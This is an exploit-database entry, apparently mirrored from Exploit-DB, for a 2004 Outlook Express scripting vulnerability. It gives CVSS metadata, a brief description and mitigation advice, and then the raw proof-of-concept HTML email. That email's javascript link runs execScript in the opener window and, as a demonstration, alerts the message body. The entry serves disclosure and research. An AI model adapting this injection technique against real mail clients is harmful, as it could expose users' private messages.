header-logo
Suggest Exploit
vendor:
Outlook Express
by:
Unknown
5.5
CVSS
MEDIUM
Scripting vulnerability
94
CWE
Product Name: Outlook Express
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

MSOE Scripting Example

This is a scripting example that demonstrates a vulnerability in MSOE (Microsoft Outlook Express). When a user clicks on the link provided in the HTML code, it executes a script that displays the innerHTML of the body element. This can be used by an attacker to extract sensitive information from the user's Outlook Express.

Mitigation:

To mitigate this vulnerability, users should exercise caution when clicking on links from untrusted sources. Additionally, keeping the software up to date with the latest security patches and using alternative email clients can reduce the risk of exploitation.
Source

Exploit-DB raw data:

From:
To:
Subject:MSOE Scripting Example
Content-Type:text/html

<html>
<body>
<a href="javascript:opener.setTimeout('execScript(\'alert(document.body.innerHTML)\')',1);window.close(
)" target="_blank">click here</a> to test
</body>
</html>

# milw0rm.com [2004-07-13]

Navigation

Suggest Exploit

Services By CQR